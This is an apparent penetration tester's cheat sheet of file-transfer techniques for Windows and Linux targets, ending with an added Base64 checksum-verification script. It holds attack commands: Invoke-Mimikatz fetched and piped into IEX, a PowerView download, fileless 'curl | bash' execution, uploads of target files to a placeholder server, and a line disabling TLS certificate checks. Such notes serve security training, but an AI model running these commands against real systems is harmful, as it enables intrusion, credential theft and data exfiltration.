File Transfer.md
## Windows File Transfer Methods

### Download

#### PowerShell Base64 Encode & Decode

We can encode a file in Base64, copy the resulting string to the target's terminal, and decode it there.

```bash
# Doing checksum before encoding
md5sum file.txt
aa...c

# Encoding with base64
cat file.txt | base64 -w 0; echo
```

```powershell
# Decoding with base64 on Windows
[IO.File]::WriteAllBytes("C:\Users\Public\file.txt", [Convert]::FromBase64String("<base64 content>"))

# Checking checksum once decoded
Get-FileHash C:\Users\Public\file.txt -Algorithm md5
aa...c
```

#### PowerShell Web Downloads

This is pretty common because companies allow outbound traffic through the firewall.

Some web filtering might prevent this if the downloaded file is an `.exe`.

| **Method** | **Description** |
| ---------- | --------------- |
| [OpenRead](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.openread?view=net-6.0) | Returns the data from a resource as a [Stream](https://docs.microsoft.com/en-us/dotnet/api/system.io.stream?view=net-6.0). |
| [OpenReadAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.openreadasync?view=net-6.0) | Returns the data from a resource without blocking the calling thread. |
| [DownloadData](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddata?view=net-6.0) | Downloads data from a resource and returns a Byte array. |
| [DownloadDataAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddataasync?view=net-6.0) | Downloads data from a resource and returns a Byte array without blocking the calling thread. |
| [DownloadFile](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-6.0) | Downloads data from a resource to a local file. |
| [DownloadFileAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfileasync?view=net-6.0) | Downloads data from a resource to a local file without blocking the calling thread. |
| [DownloadString](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-6.0) | Downloads a String from a resource and returns a String. |
| [DownloadStringAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstringasync?view=net-6.0) | Downloads a String from a resource without blocking the calling thread. |

```powershell
# Downloading files using PowerShell on Windows
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
# OR
(New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')

# Downloading String
# Can be piped into IEX to run it directly in memory
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/refs/heads/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1') | IEX

# Downloading using Invoke-WebRequest
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

# If any method above doesn't work because of Internet Explorer, use
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 -UseBasicParsing

# Set this if there is any error because of SSL/TLS
# (it disables certificate validation for the current PowerShell session)
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

You can find a longer list [here](https://gist.github.com/HarmJ0y/bb48307ffa663256e239).

#### SMB Downloads

We can use [[Impacket smbserver.py]] together with `copy`, `move`, or [[PowerShell]] `Copy-Item`.

```bash
# Creating SMB Server on Linux Device with share named share
sudo impacket-smbserver share -smb2support /tmp/smbshare

# Creating SMB Server on Linux Device with share named share
# User and Pass set to test
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
```

```cmd
REM Connecting to SMB Server
net use n: \\<ip>\share

REM Connecting to SMB Server with username and password test
net use n: \\<ip>\share /user:test test

REM Copying the desired files
copy n:\file.exe
```

#### FTP Downloads

```bash
# Installing ftp server python3 module
sudo pip3 install pyftpdlib

# Setting up ftp server on linux
sudo python3 -m pyftpdlib --port 21
```

```powershell
# Downloading file from a ftp server using PowerShell
(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')
```

Below is an example of how to make a command file that runs all the commands once connected to the [[FTP]] server.

```cmd
echo open <ip> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET <desirefile> >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
```

### Upload

#### PowerShell Base64 Encode & Decode

```powershell
# Checking checksum before encoding
Get-FileHash "C:\Path\To\File" -Algorithm MD5 | select Hash

# Encoding with Base64 on PowerShell
[Convert]::ToBase64String((Get-Content -path "C:\Path\To\File" -Encoding byte))
```

```bash
# Decoding Base64 string
echo '<base64 string>' | base64 -d > <filename>

# Checking checksum after decoding
md5sum <filename>
```

#### PowerShell Web Uploads

```bash
# Setting up upload server
pip3 install uploadserver
python3 -m uploadserver

# Setting up Netcat to receive Base64 data
nc -lvnp 8080
```

```powershell
# Downloading the script needed to upload files
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

# Uploading file to server
Invoke-FileUpload -Uri http://<server-ip>/upload -File C:\Path\To\File

# Uploading Base64 to server
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Path\To\File' -Encoding Byte))
Invoke-WebRequest -Uri http://<server-ip>/ -Method POST -Body $b64
```

#### SMB Uploads

The [[SMB]] protocol is commonly not allowed outside the internal network.

We can run [[SMB]] over [[HTTP]] with WebDAV. Windows will first try to connect using the [[SMB]] protocol; if there is no [[SMB]] share available, it will connect using [[HTTP]].

```bash
# Setting up WebDav Server
sudo pip3 install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
```

```powershell
# Connecting to WebDav Server
dir \\<webdav ip>\DavWWWRoot

# Uploading files using SMB
copy C:\Path\To\File \\<webdav ip>\DavWWWRoot\
# OR
copy C:\Path\To\File \\<webdav ip>\<sharefolder>\
```

```ad-note
DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. The DavWWWRoot keyword tells the Mini-Redirector driver, which handles WebDAV requests, that you are connecting to the root of the WebDAV server.
```

#### FTP

```bash
# Setting up ftp server for upload
sudo python3 -m pyftpdlib --port 21 --write
```

```powershell
# Uploading file to FTP server
(New-Object Net.WebClient).UploadFile('ftp://<ftp ip>/<filename>', 'C:\Path\To\File')
```

You could also make a command file for uploading a file using [[FTP]].

```cmd
echo open <ftp ip> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\path\to\file >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
```

## Linux File Transfer Operation

### Download

#### Base64 Encoding / Decoding

```bash
# Check file checksum
md5sum <file>

# Encode file using Base64
cat <file> | base64 -w 0; echo

# Decode Base64 string
echo -n '<base64 string>' | base64 -d > <file>
```

#### Web Downloads using [[wget]] and [[curl]]

```bash
# Download file using wget
wget http://<ip>/<file> -O <output file name>

# Download using curl
curl -o <output file name> http://<ip>/<file>

# Fileless download with wget
# -q is for quiet mode, no output to stdout
# -O- is redirecting downloaded content to stdout
wget -qO- http://<ip>/<filename>.py | python3

# Fileless download with curl
curl http://<ip>/<file> | bash
```

#### Download with Bash (/dev/tcp)

```bash
# Run all the lines below one after another
exec 3<>/dev/tcp/<ip>/<port>            # Connect to the server; fd 3 is a read/write TCP socket
echo -e "GET /<file> HTTP/1.1\n\n">&3   # Send the HTTP GET by redirecting stdout to fd 3 (the socket)
cat <&3                                 # Read the response from fd 3 (the socket)
```

#### SSH Downloads

```bash
# Check which port SSH is listening on
netstat -lnpt

# Download a file and save it in the current working directory
scp <user>@<ip>:/location/to/file .
```

### Upload

#### Web Upload

```bash
# Install upload web server
sudo python3 -m pip install --user uploadserver

# Create a self signed cert
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# Starting web server with self signed cert
sudo python3 -m uploadserver 443 --server-certificate /path/to/file.pem

# Uploading multiple files
# The @ is telling curl to take the file's content
curl -X POST https://<ip>/upload -F 'files=@/path/to/file1' -F 'files=@/path/to/file2' --insecure
```

#### Alternative Web File Transfer Method

```bash
# Starting a server in python
python3 -m http.server

# Starting a server in python 2
python2.7 -m SimpleHTTPServer

# Starting a server in php
php -S 0.0.0.0:8000

# Starting a server in ruby
ruby -run -ehttpd . -p8000

# Downloading the file from target
wget <target ip>:<port>/<filename>

# Using scp to upload files
scp /path/to/file <user>@<ip>:/path/to/save/file
```
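
The Base64 encode/decode transfers in the Windows and Linux sections above rely on comparing checksums by eye. The following is an added example, not part of the original notes, that enforces that comparison on the Linux side and tolerates a wrapped or CRLF-mangled paste; the function names `b64_send`, `b64_recv` and `b64_demo` and the sample bytes are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added example: names b64_send, b64_recv and b64_demo are hypothetical.
# MD5 is kept to match the notes; sha256sum can be swapped in on both ends.

# Sender: print the file's MD5, then its Base64 as one unwrapped line.
b64_send() {
    md5sum "$1" | cut -d' ' -f1
    base64 -w 0 "$1"; echo
}

# Receiver: decode Base64 from stdin into a temp file and move it to $2 only
# if its MD5 matches the expected hash in $1. Returns 1 on mismatch, 2 on bad input.
b64_recv() {
    local expected out tmp actual
    # Get-FileHash prints upper-case hex, md5sum lower-case: normalise first.
    expected=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    out=$2
    tmp=$(mktemp) || return 2
    # A terminal paste can wrap lines or add CRs; strip all whitespace.
    if ! tr -d ' \t\r\n' | base64 -d > "$tmp" 2>/dev/null; then
        rm -f "$tmp"; echo "decode failed: not valid Base64" >&2; return 2
    fi
    actual=$(md5sum "$tmp" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        rm -f "$tmp"
        echo "checksum mismatch: got $actual, expected $expected" >&2; return 1
    fi
    mv "$tmp" "$out"
}

# Constructed round trip: binary sample, pasted wrapped at 20 columns with CRLF.
b64_demo() {
    local dir hash b64 rc=0
    dir=$(mktemp -d) || return 2
    printf 'constructed\000sample\377bytes\n' > "$dir/in.bin"
    hash=$(b64_send "$dir/in.bin" | sed -n 1p)
    b64=$(b64_send "$dir/in.bin" | sed -n 2p)
    { printf '%s\n' "$b64" | fold -w 20 | awk '{printf "%s\r\n", $0}' \
        | b64_recv "$hash" "$dir/out.bin" \
        && cmp -s "$dir/in.bin" "$dir/out.bin"; } || rc=1
    rm -rf "$dir"
    return $rc
}

b64_demo && echo "round trip verified"
```

Because the output file is only created after the hash matches, a truncated or altered paste never leaves a partial file at the destination path.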